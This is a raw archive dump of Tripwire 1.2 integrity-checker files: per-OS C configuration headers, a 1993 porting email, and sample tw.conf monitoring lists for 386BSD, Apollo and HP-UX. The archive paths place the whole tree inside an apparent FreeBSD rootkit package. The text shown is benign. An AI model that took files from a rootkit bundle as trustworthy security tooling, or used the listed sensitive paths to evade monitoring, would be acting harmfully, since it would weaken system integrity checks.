even try the stock compiler). * I've still got a few minor bugs in the port that I'm trying to track down. * It works, but occasionally complains about things - rerun it and * everything's fine - probably some pointer problem... * */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #undef SYSV #define SYSV 3 /* * does your system have a like System V? */ #define MALLOCH /* * does your system have a like POSIX says you should? */ /* #define STDLIBH */ /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #undef GETHOSTNAME /* * missing defines */ #define MAXPATHLEN 255 fbsdrootkit-1.2/tripwire-1.2/configs/conf-motoR32.h100600 764 764 1741 5611466323 17300 0ustar dfdf/* * conf-svr3.h * * Tripwire configuration file * * Kevin Johnson * Motorola Computer Group * * Notes: I used gcc 2.4.5 to compile. Didn't even try compiling it * with the stock C compiler. * */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #undef SYSV #define SYSV 3 /* * does your system have a like System V? */ #define MALLOCH /* * does your system have a like POSIX says you should? */ #define STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #undef GETHOSTNAME /* * missing defines */ #define MAXPATHLEN 255 fbsdrootkit-1.2/tripwire-1.2/configs/conf-motoR4.h100600 764 764 1553 5611466324 17221 0ustar dfdf/* * conf-motoR4.h * * Tripwire configuration file * * Kevin Johnson * Motorola Computer Group * * Notes: use /usr/ucb/cc to compile. * */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #define SYSV 4 /* * does your system have a like System V? */ #define MALLOCH /* * does your system have a like POSIX says you should? */ #define STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ /* #define DIRENT */ /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #undef GETHOSTNAME fbsdrootkit-1.2/tripwire-1.2/configs/conf-odt2.h100600 764 764 1651 5611466325 16705 0ustar dfdf/* * conf-odt2.h * * Tripwire configuration file * * * Mark Kohler * Intellex Computer Consulting * kohler@dcs.umd.edu * */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #define SYSV 3 /* * does your system have a like System V? */ #define MALLOCH /* * does your system have a like POSIX says you should? */ #define STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #undef GETHOSTNAME /* * missing defines */ #define MAXPATHLEN 1024 #define NOGETTIMEOFDAY fbsdrootkit-1.2/tripwire-1.2/configs/conf-osf1.h100600 764 764 1627 5611466327 16712 0ustar dfdf/* $Id: conf-osf1.h,v 1.3 1994/07/15 11:02:47 gkim Exp $ */ /* * conf-osf1.h * * Tripwire configuration file * * Gene Kim * Purdue University * * OSF/1 port by: * Rich Salz */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #undef SYSV /* * does your system have a like System V? */ #undef MALLOCH /* * does your system have a like POSIX says you should? */ #define STDLIBH /* * does your system have gethostname(2) (instead of uname(2))? */ #define GETHOSTNAME /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH fbsdrootkit-1.2/tripwire-1.2/configs/conf-osx-att.h100600 764 764 1361 5434607444 17434 0ustar dfdf/* $Id: conf-osx-att.h,v 1.2 1993/08/19 05:27:00 genek Exp $ */ /* * conf-osx-att.h * * Tripwire configuration file for Pyramid's OSx and att universe * * Ken McDonell * Pyramid Technology * */ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #define SYSV 3 /* * does your system have a like System V? */ #define MALLOCH /* * does your system have a like POSIX says you should? */ #undef STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include ok? (as opposed to ) */ #undef STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #undef GETHOSTNAME fbsdrootkit-1.2/tripwire-1.2/configs/conf-osx-ucb.h100600 764 764 1444 5434607446 17421 0ustar dfdf/* $Id: conf-osx-ucb.h,v 1.2 1993/08/19 05:27:02 genek Exp $ */ /* * conf-osx-ucb.h * * Tripwire configuration file for Pyramid's OSx and ucb universe * * Ken McDonell * Pyramid Technology * */ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #undef SYSV /* * does your system have a like System V? */ #undef MALLOCH /* * does your system have a like POSIX says you should? */ #undef STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? * -- yes, but we do not have a to #include */ #undef DIRENT /* * is #include ok? (as opposed to ) */ #undef STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #define GETHOSTNAME fbsdrootkit-1.2/tripwire-1.2/configs/conf-ptx2.h100600 764 764 4563 5474057110 16732 0ustar dfdfFrom a4mp@loki.cc.pdx.edu Wed Oct 6 18:12:34 1993 Return-Path: Received: from arthur.cs.purdue.edu by barnum.cs.purdue.edu (5.65c/PURDUE_CS-1.2) id ; Wed, 6 Oct 1993 18:12:33 -0500 Received: from pdxgate.cs.pdx.edu by arthur.cs.purdue.edu (5.65c/PURDUE_CS-1.2) id ; Wed, 6 Oct 1993 18:12:28 -0500 Received: from loki.cc.pdx.edu by pdxgate.cs.pdx.edu (4.1/pdx-gateway-evision: 1.30 id AA25253; Wed, 6 Oct 93 16:12:21 PDT Received: from loki.cc.pdx.edu by loki.cc.pdx.edu (5.65/pdx-client-evision: 1.19F id AA14453; Wed, 6 Oct 93 23:12:09 GMT From: a4mp@loki.cc.pdx.edu (Michael Perrone) Message-Id: <9310062312.AA14453@loki.cc.pdx.edu> Subject: Re: Ptx 2.0 files for tripwire 1.0.4 To: spaf (Gene Spafford) Date: Wed, 6 Oct 93 16:12:07 PDT Cc: gkim In-Reply-To: <199310040639.AA24668@uther.cs.purdue.edu>; from "Gene Spafford" at Oct 4, 93 1:39 am X-Mailer: ELM [version 2.3 PL11] Status: ORr Gene Spafford writes: > > Please send the files to us -- we'd love to have them in the next > release! > > --spaf > Okay, what follows is "conf-ptx2.h" I'll let you know if this file works under ptx 2.1 in a week or two. -- Michael Perrone -- -------- CUT HERE ------------- /* conf-ptx2.h * * Tripwire configuration file * * Michael Perrone -- a4mp@loki.cc.pdx.edu * Portland State University */ /* include file for bsd types such as u_long */ #include /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * Even though ptx 2 is based on SVR4, there is some stuff * missing that tripwire expects for SYSV = 4 */ #define SYSV 3 /* * ptx has never had this - use system call "time" */ #define NOGETTIMEOFDAY /* * does your system have a like System V? * ptx does */ #define MALLOCH /* * does your system have a like POSIX says you should? * ptx has stdlib.h */ #define STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? * ptx does */ #define DIRENT /* * is #include ok? (as opposed to ) * ptx uses */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? * ptx provides both calls. */ #undef GETHOSTNAME fbsdrootkit-1.2/tripwire-1.2/configs/conf-riscos.h100600 764 764 1676 5434607447 17353 0ustar dfdf/* $Id: conf-riscos.h,v 1.2 1993/08/19 05:27:03 genek Exp $ */ /* * conf-riscos4.h (for SYSTYPE_BSD43) * * Tripwire configuration file * * Gene Kim * Purdue University * * Ported to RiscOS * Harlan Stenn */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #undef SYSV /* * does your system have a like System V? */ #undef MALLOCH /* * does your system have a like POSIX says you should? */ #undef STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #undef DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #define GETHOSTNAME fbsdrootkit-1.2/tripwire-1.2/configs/conf-sco.h100600 764 764 1672 5532334026 16616 0ustar dfdf/* $Id: conf-sco.h,v 1.1 1994/02/22 07:45:26 gkim Exp $ */ /* * conf-sco.h * * Tripwire configuration file * * Gene Kim * Purdue University * */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #define SYSV 3 /* * does your system have a like System V? */ #define MALLOCH /* * does your system have a like POSIX says you should? */ #define STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #undef GETHOSTNAME /* * missing defines */ #define NOGETTIMEOFDAY #define MAXPATHLEN PATH_MAX fbsdrootkit-1.2/tripwire-1.2/configs/conf-sco2.h100600 764 764 1720 5611466330 16674 0ustar dfdf/* $Id: conf-sco2.h,v 1.1 1994/07/15 11:02:48 gkim Exp $ */ /* * conf-sco.h * * Tripwire configuration file * * Gene Kim * Purdue University * */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #define SYSV 3 /* * does your system have a like System V? */ #define MALLOCH /* * does your system have a like POSIX says you should? */ #define STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #undef GETHOSTNAME /* * missing defines */ #define NOGETTIMEOFDAY #define PATH_MAX 200 #define MAXPATHLEN PATH_MAX fbsdrootkit-1.2/tripwire-1.2/configs/conf-sunos-4.0.h100600 764 764 1620 5434607450 17476 0ustar dfdf/* $Id: conf-sunos-4.0.h,v 1.2 1993/08/19 05:27:04 genek Exp $ */ /* * conf-sunos-4.0.h (SunOS versions prior to 4.1) * * Tripwire configuration file * * Gene Kim * Purdue University */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #undef SYSV /* * does your system have a like System V? */ #define MALLOCH /* * does your system have a like POSIX says you should? */ #undef STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #define GETHOSTNAME fbsdrootkit-1.2/tripwire-1.2/configs/conf-sunos-4.1.h100600 764 764 1613 5434607451 17502 0ustar dfdf/* $Id: conf-sunos-4.1.h,v 1.2 1993/08/19 05:27:05 genek Exp $ */ /* * conf-sunos-4.1.h (SunOS versions >= 4.1) * * Tripwire configuration file * * Gene Kim * Purdue University */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #undef SYSV /* * does your system have a like System V? */ #define MALLOCH /* * does your system have a like POSIX says you should? */ #define STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #define GETHOSTNAME fbsdrootkit-1.2/tripwire-1.2/configs/conf-svr3.h100600 764 764 1646 5434607452 16737 0ustar dfdf/* $Id: conf-svr3.h,v 1.2 1993/08/19 05:27:06 genek Exp $ */ /* * conf-svr3.h * * Tripwire configuration file * * Gene Kim * Purdue University * */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #define SYSV 3 /* * does your system have a like System V? */ #define MALLOCH /* * does your system have a like POSIX says you should? */ #define STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #undef GETHOSTNAME /* * missing defines */ #define MAXPATHLEN PATH_MAX fbsdrootkit-1.2/tripwire-1.2/configs/conf-svr4.h100600 764 764 1552 5434607453 16735 0ustar dfdf/* $Id: conf-svr4.h,v 1.2 1993/08/19 05:27:07 genek Exp $ */ /* * conf-svr4.h * * Tripwire configuration file * * Gene Kim * Purdue University */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #define SYSV 4 /* * does your system have a like System V? */ #define MALLOCH /* * does your system have a like POSIX says you should? */ #define STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #undef GETHOSTNAME fbsdrootkit-1.2/tripwire-1.2/configs/conf-umaxv.h100600 764 764 2112 5476717460 17176 0ustar dfdf/* $Id: conf-umaxv.h,v 1.3 1993/11/30 19:29:52 genek Exp $ */ /* * conf-umaxv.h * * Tripwire configuration file * * Gene Kim * Purdue University * * Modified by Michael Barnett (mikeb@rmit.edu.au) for UMAX V R2.4.1. * Modified by Georges Tomazi (tomazi@kralizec.zeta.org.au) for UMAX V 2.4.1.P3 * */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #define SYSV 2 /* * does your system have a like System V? */ #define MALLOCH /* * does your system have a like POSIX says you should? */ #undef STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #define GETHOSTNAME /* * miscellaneous stuff - mnb */ #define MAXPATHLEN PATH_MAX fbsdrootkit-1.2/tripwire-1.2/configs/conf-unicos.h100600 764 764 2010 5434607455 17327 0ustar dfdf/* $Id: conf-unicos.h,v 1.2 1993/08/19 05:27:09 genek Exp $ */ /* * conf-unicos.h * * Tripwire configuration file * * Gene Kim * Purdue University * * Unicos port by: * Michael Barnett */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #define SYSV 3 /* * does your system have a like System V? */ #define MALLOCH /* * does your system have a like POSIX says you should? */ #define STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #undef GETHOSTNAME /* * miscallaneous stuff -mnb */ #define UNICOS #define MAXPATHLEN PATH_MAX fbsdrootkit-1.2/tripwire-1.2/configs/conf-xenix.h100600 764 764 2056 5434607456 17175 0ustar dfdf/* $Id: conf-xenix.h,v 1.3 1993/08/19 05:27:10 genek Exp $ */ /* * conf-xenix.h * * Tripwire configuration file * * Gene Kim * Purdue University * * Xenix port by: * Daniel Ray */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #define SYSV 3 /* * does your system have a like System V? */ #define MALLOCH /* * does your system have a like POSIX says you should? */ #define STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #undef DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #undef GETHOSTNAME /* * To work around lack of gettimeofday() in src/dbase.build.c */ #define NOGETTIMEOFDAY /* * miscallaneous stuff */ #define XENIX fbsdrootkit-1.2/tripwire-1.2/configs/tw.conf.386bsd100600 764 764 7136 5474057111 17252 0ustar dfdf# $Id: tw.conf.386bsd,v 1.1 1993/11/22 06:38:01 genek Exp $ # # tripwire.config # Generic version for 386BSD # Will need editing...see comments below # # This file contains a list of files and directories that System # Preener will scan. Information collected from these files will be # stored in the tripwire.database file. # # Format: [!|=] entry [ignore-flags] # # where: '!' signifies the entry is to be pruned (inclusive) from # the list of files to be scanned. # '=' signifies the entry is to be added, but if it is # a directory, then all its contents are pruned # (useful for /tmp). # # where: entry is the absolute pathname of a file or a directory # # where ignore-flags are in the format: # [template][ [+|-][pinugsam12] ... ] # # - : ignore the following atributes # + : do not ignore the following attributes # # p : permission and file mode bits a: access timestamp # i : inode number m: modification timestamp # n : number of links (ref count) c: inode creation timestamp # u : user id of owner 1: signature 1 # g : group id of owner 2: signature 2 # s : size of file # # # Ex: The following entry will scan all the files in /etc, and report # any changes in mode bits, inode number, reference count, uid, # gid, modification and creation timestamp, and the signatures. # However, it will ignore any changes in the access timestamp. # # /etc +pinugsm12-a # # The following templates have been pre-defined to make these long ignore # mask descriptions unecessary. # # Templates: (default) R : [R]ead-only (+pinugsm12-a) # L : [L]og file (+pinug-sam12) # N : ignore [N]othing (+pinusgsamc12) # E : ignore [E]verything (-pinusgsamc12) # # By default, Tripwire uses the R template -- it ignores # only the access timestamp. # # You can use templates with modifiers, like: # Ex: /etc/lp E+ug # # Example configuration file: # /etc R # all system files # !/etc/lp R # ...but not those logs # =/tmp N # just the directory, not its files # # Note the difference between pruning (via "!") and ignoring everything # (via "E" template): Ignoring everything in a directory still monitors # for added and deleted files. Pruning a directory will prevent Tripwire # from even looking in the specified directory. # # # Tripwire running slowly? Modify your tripwire.config entries to # ignore the (signature 2) attribute when this computationally-exorbitant # protection is not needed. (See README and design document for further # details.) # # First, root's "home" =/ L /.rhosts R # may not exist /.profile R # may not exist /.cshrc R # may not exist /.login R # may not exist /.exrc R # may not exist /.logout R # may not exist /.emacs R # may not exist /.forward R # may not exist /.netrc R # may not exist # Unix itself /386bsd R # /bin and exceptions /bin R-2 /bin/mail R /bin/rcp R /bin/rnews R # /dev /dev L # /etc and exceptions /etc R-2 /etc/aliases L /etc/daily L /etc/disktab L /etc/dumpdates L /etc/master.passwd L /etc/monthly L /etc/motd L /etc/passwd L /etc/pwd.db L /etc/spwd.db L /etc/uucp L /etc/weekly L # /home =/home # /news/lib /news/lib/inews R /news/lib/nnmaster R # /root /root R-2 /root/.history L # /sbin /sbin R-2 # /usr/bin /usr/bin R-2 /usr/include R-12 /usr/lib R-2 /usr/libexec R-2 /usr/local/bin R-2 /usr/local/etc L /usr/local/lib/mail L /usr/sbin R-2 /usr/src/bin R-2 /usr/src/lib R-2 /usr/src/libexec R-2 /usr/src/sbin R-2 /usr/src/usr.bin R-2 /usr/src/usr.sbin R-2 /usr/src/sys.386bsd R-2 !/usr/src/sys.386bsd/compile !/usr/src/sys.386bsd/conf !/usr/src/sys.386bsd/i386/conf ########################################### fbsdrootkit-1.2/tripwire-1.2/configs/tw.conf.apollo100600 764 764 11613 5532334027 17541 0ustar dfdf# Sample config file for Apollos. # IMPORTANT: The permissions on Apollos, as freshly installed, # are a total disaster as far as security is concerned. If you # care about security, get hold of some scripts I have # available for anonymous FTP from maths.su.oz.au in directory # protect (and also mirror sites, notably ftp.eb.ele.tue.nl). # Also note that tripwire does not understand the intricacies # of Apollo ACLs (initial file/directory ACLs, extended ACLs, # permissions for organizations, subsystem managers: # 'subsystem login manager' is better than 'setuid root'). # Try to include everything, except what we know changes on a # running system, and things that would make tripwire hang or # bomb (or hang the node). Or you may want # +pugs15-inamc02346789 (and +pug-insamc0123456789) so you can # use the same database file on all nodes (??!!). / +pinugsmc15-a02346789 /bsd4.3/usr/lib/sendmail.st +pinug-samc0123456789 !/etc/gated.pid R !/etc/gated.version R /etc/group +pinug-samc0123456789 /etc/org +pinug-samc0123456789 /etc/passwd +pinug-samc0123456789 !/etc/sendmail.pid R =/install +pinug-samc0123456789 /lost+found.list +pinug-samc0123456789 !/sys/ns/helper_data/ns_helper.db R !/sys/ns/helper_data/ns_helper.prop R !/sys/registry/rgy_data R /sys/registry/rgy_local +pinug-samc0123456789 /sys/registry/rgy_local.bak +pinug-samc0123456789 =/usr/spool/mqueue +pinug-samc0123456789 # Remember to repeat the node_data block for all diskless # nodes (i.e. all node_data.nnnnn trees). /sys/node_data/dev/crp00 +pinug-samc0123456789 /sys/node_data/dev/crp01 +pinug-samc0123456789 /sys/node_data/dev/crp02 +pinug-samc0123456789 /sys/node_data/dev/crp03 +pinug-samc0123456789 /sys/node_data/dev/crp04 +pinug-samc0123456789 /sys/node_data/dev/crp05 +pinug-samc0123456789 /sys/node_data/dev/crp06 +pinug-samc0123456789 /sys/node_data/dev/crp07 +pinug-samc0123456789 /sys/node_data/dev/crp08 +pinug-samc0123456789 /sys/node_data/dev/crp09 +pinug-samc0123456789 /sys/node_data/dev/crp10 +pinug-samc0123456789 /sys/node_data/dev/crp11 +pinug-samc0123456789 /sys/node_data/dev/crp12 +pinug-samc0123456789 /sys/node_data/dev/crp13 +pinug-samc0123456789 /sys/node_data/dev/crp14 +pinug-samc0123456789 /sys/node_data/dev/crp15 +pinug-samc0123456789 !/sys/node_data/dpci1_trace1 R !/sys/node_data/dpci1_trace2 R !/sys/node_data/dpci1_trace3 R !/sys/node_data/dpci1_xpombx1 R !/sys/node_data/dpci1_xpombx2 R !/sys/node_data/dpci1_xpombx3 R !/sys/node_data/dpci_dump_log R !/sys/node_data/dpcinet_trace0 R !/sys/node_data/dpcinet_trace1 R !/sys/node_data/dpcinet_trace2 R !/sys/node_data/dpcinet_trace3 R !/sys/node_data/dpcinet_trace4 R !/sys/node_data/dpcinet_xpombx R !/sys/node_data/dpcipcc_server0 R !/sys/node_data/dpcipcc_server_trace0 R !/sys/node_data/dpcipcc_trace0 R !/sys/node_data/dpcipcc_xpombx R /sys/node_data/etc/.rgyloc +pinug-samc0123456789 /sys/node_data/etc/fstab +pinug-samc0123456789 /sys/node_data/etc/mnttab +pinug-samc0123456789 !/sys/node_data/etc/named.pid R !/sys/node_data/etc/syslog.pid R /sys/node_data/etc/utmp +pinug-samc0123456789 !/sys/node_data/glb.d R !/sys/node_data/glb.r R !/sys/node_data/hint_file R /sys/node_data/ipc_data +pinug-samc0123456789 !/sys/node_data/os_paging_file R =/sys/node_data/paste_buffers +pinug-samc0123456789 =/sys/node_data/proc_dir +pinug-samc0123456789 =/sys/node_data/system_logs +pinug-samc0123456789 =/sys/node_data/systmp +pinug-samc0123456789 =/sys/node_data/tmp +pinug-samc0123456789 =/sys/node_data/usrtmp +pinug-samc0123456789 fbsdrootkit-1.2/tripwire-1.2/configs/tw.conf.hp2100600 764 764 12543 5434607457 16762 0ustar dfdf# $Id: tw.conf.hp2,v 1.3 1993/08/19 05:27:11 genek Exp $ # # tripwire.config # Generic version for HP/UX # # Joe Polcari # # This file contains a list of files and directories that System # Preener will scan. Information collected from these files will be # stored in the tripwire.database file. # # Format: [!|=] entry [ignore-flags] # # where: '!' signifies the entry is to be pruned (inclusive) from # the list of files to be scanned. # '=' signifies the entry is to be added, but if it is # a directory, then all its contents are pruned # (useful for /tmp). # # where: entry is the absolute pathname of a file or a directory # # where ignore-flags are in the format: # [template][ [+|-][pinugsam12] ... ] # # - : ignore the following atributes # + : do not ignore the following attributes # # p : permission and file mode bits a: access timestamp # i : inode number m: modification timestamp # n : number of links (ref count) c: inode creation timestamp # u : user id of owner 1: signature 1 # g : group id of owner 2: signature 2 # s : size of file # # # Ex: The following entry will scan all the files in /etc, and report # any changes in mode bits, inode number, reference count, uid, # gid, modification and creation timestamp, and the signatures. # However, it will ignore any changes in the access timestamp. # # /etc +pinugsm12-a # # The following templates have been pre-defined to make these long ignore # mask descriptions unecessary. # # Templates: (default) R : [R]ead-only (+pinugsm12-a) # L : [L]og file (+pinug-sam12) # N : ignore [N]othing (+pinusgsamc12) # E : ignore [E]verything (-pinusgsamc12) # # By default, Tripwire uses the R template -- it ignores # only the access timestamp. # # You can use templates with modifiers, like: # Ex: /etc/lp E+ug # # Example configuration file: # /etc R # all system files # !/etc/lp R # ...but not those logs # =/tmp N # just the directory, not its files # # Note the difference between pruning (via "!") and ignoring everything # (via "E" template): Ignoring everything in a directory still monitors # for added and deleted files. Pruning a directory will prevent Tripwire # from even looking in the specified directory. # # # Tripwire running slowly? Modify your tripwire.config entries to # ignore the (signature 2) attribute when this computationally-exorbitant # protection is not needed. (See README and design document for further # details.) # # First, root's "home" =/ L /.rhosts R # may not exist /.profile R # may not exist /.cshrc R # may not exist /.login R # may not exist #/.exrc R # may not exist /.logout R # may not exist #/.emacs R # may not exist /.forward R # may not exist #/.netrc R # may not exist /.defaults R /.suntools R /.mailrc R /.kermrc R /.newsrc R # Unix itself /vmunix R # Now, some critical directories and files # Some exceptions are noted further down /etc R /etc/inetd.conf R /etc/rc R /etc/rc.boot R /etc/rc.local R-2 /etc/rc.single R #/etc/rc.ip R /etc/ttytab R /etc/exports R /etc/ttys L /etc/dumpdates L /etc/mtab L /etc/motd L /etc/rmtab L /etc/utmp L /etc/group R # changes should be infrequent # The next line may need to be replaced with /etc/security # if C2 is enabled /etc/passwd L /var L /dev E /usr/etc R # Checksumming the following is not so critical. However, # setuid/setgid files are special-cased further down. /lib R-2 /bin R-2 /usr/bin R-2 /usr/ucb R-2 /usr/lib R-2 /usr1/local R-2 /usr2/pics E =/usr L =/usr/spool L /usr/spool/cron L /usr/spool/mqueue L /usr/spool/mail L # You may or may not have the following #/usr/ftp L #/usr/ftp/bin R #/usr/ftp/etc R # put entries in for /var/yp if you need it # put entries for uucp if you need them # put entries for /var/adm if you need it =/tmp =/var/tmp # Here are entries for setuid/setgid files. On these, we use # both signatures just to be sure. # # You may want/need to edit this list. Batteries not inc. /admin N /bin/at R /bin/atq R /bin/atrm R #/bin/cancel R /bin/chfn R /bin/chsh R /bin/crontab R /bin/cu R /bin/df R /bin/iostat R /bin/ipcs R /bin/login R #/bin/lpstat R /bin/mail R /bin/newgrp R /bin/passwd R /bin/su R #/bin/sunview1/sv_acquire R #/bin/sunview1/sv_release R #/bin/sunview1/toolplaces R /bin/tip R /bin/uucp R /bin/uuname R /bin/uustat R /bin/uux R /bin/wall R /bin/write R #/bin/ypchfn R #/bin/ypchsh R /bin/yppasswd R /usr/bin/at R /usr/bin/atq R /usr/bin/atrm R #/usr/bin/cancel R /usr/bin/chfn R /usr/bin/chsh R /usr/bin/crontab R /usr/bin/cu R /usr/bin/df R /usr/bin/iostat R /usr/bin/ipcs R /usr/bin/login R #/usr/bin/lpstat R /usr/bin/mail R /usr/bin/newgrp R /usr/bin/passwd R /usr/bin/su R #/usr/bin/sunview1/sv_acquire R #/usr/bin/sunview1/sv_release R #/usr/bin/sunview1/toolplaces R /usr/bin/tip R /usr/bin/uucp R /usr/bin/uuname R /usr/bin/uustat R /usr/bin/uux R /usr/bin/wall R /usr/bin/write R #/usr/bin/ypchfn R #/usr/bin/ypchsh R /usr/bin/yppasswd R /usr/etc/arp R #/usr/etc/chill R #/usr/etc/devinfo R /usr/etc/dkinfo R /usr/etc/dmesg R /usr/etc/dump R /usr/etc/dumpfs R /usr/etc/keyenvoy R /usr/etc/kgmon R /usr/etc/lpc R /usr/etc/nfsstat R /usr/etc/ping R /usr/etc/rpc.rwalld R /usr/etc/trpt R /usr/ucb/lpq R /usr/ucb/lpr R /usr/ucb/netstat R /usr/ucb/rcp R /usr/ucb/rdist R /usr/ucb/rlogin R /usr/ucb/rsh R /usr/ucb/talk R /usr/ucb/vmstat R fbsdrootkit-1.2/tripwire-1.2/configs/tw.conf.hpux100600 764 764 3454 5434607460 17230 0ustar dfdf# $Id: tw.conf.hpux,v 1.3 1993/08/19 05:27:12 genek Exp $ # # Lance R. Bailey # # First, root's "home" =/ L /.rhosts R # may not exist /.profile R # may not exist /.cshrc R # may not exist /.login R # may not exist /.exrc R # may not exist /.logout R # may not exist /.emacs R # may not exist /.forward R # may not exist /.netrc R # may not exist # Unix itself /hp-ux R /SYSBCKUP R # Now, some critical directories and files # Some exceptions are noted further down /etc R =/etc/conf =/etc/filesets =/etc/interface.lib =/etc/newconfig =/etc/oldconfig =/etc/update.lib =/etc/sm =/etc/sm.bak =/etc/rmfn.lib /etc/inetd.conf R /etc/rc R /etc/gettydefs R /etc/exports R /etc/motd L /etc/rmtab L /etc/utmp L /etc/group R # changes should be infrequent /etc/passwd L /dev L /usr/etc R # Checksumming the following is not so critical. However, # setuid/setgid files are special-cased further down. /lib R-2 /bin R-2 /usr/bin R-2 /usr/lib R-2 =/usr/lib/nls =/usr L =/usr/spool L /usr/spool/cron L /usr/spool/mqueue L /usr/mail L =/tmp =/usr/tmp # Here are entries for setuid/setgid files. On these, we use # both signatures just to be sure. # # You may want/need to edit this list. Batteries not inc. /bin/df R /bin/ipcs R /bin/login R /bin/mail R /bin/passwd R /bin/rmail R /bin/su R /bin/write R /etc/diskinfo R /etc/dmesg R /etc/dump R /etc/ping R /etc/wall R /usr/bin/at R /usr/bin/bdf R /usr/bin/cancel R /usr/bin/chfn R /usr/bin/chsh R /usr/bin/crontab R /usr/bin/cu R /usr/bin/iostat R /usr/bin/lpr R /usr/bin/lpstat R /usr/bin/mailx R /usr/bin/netstat R /usr/bin/rcp R 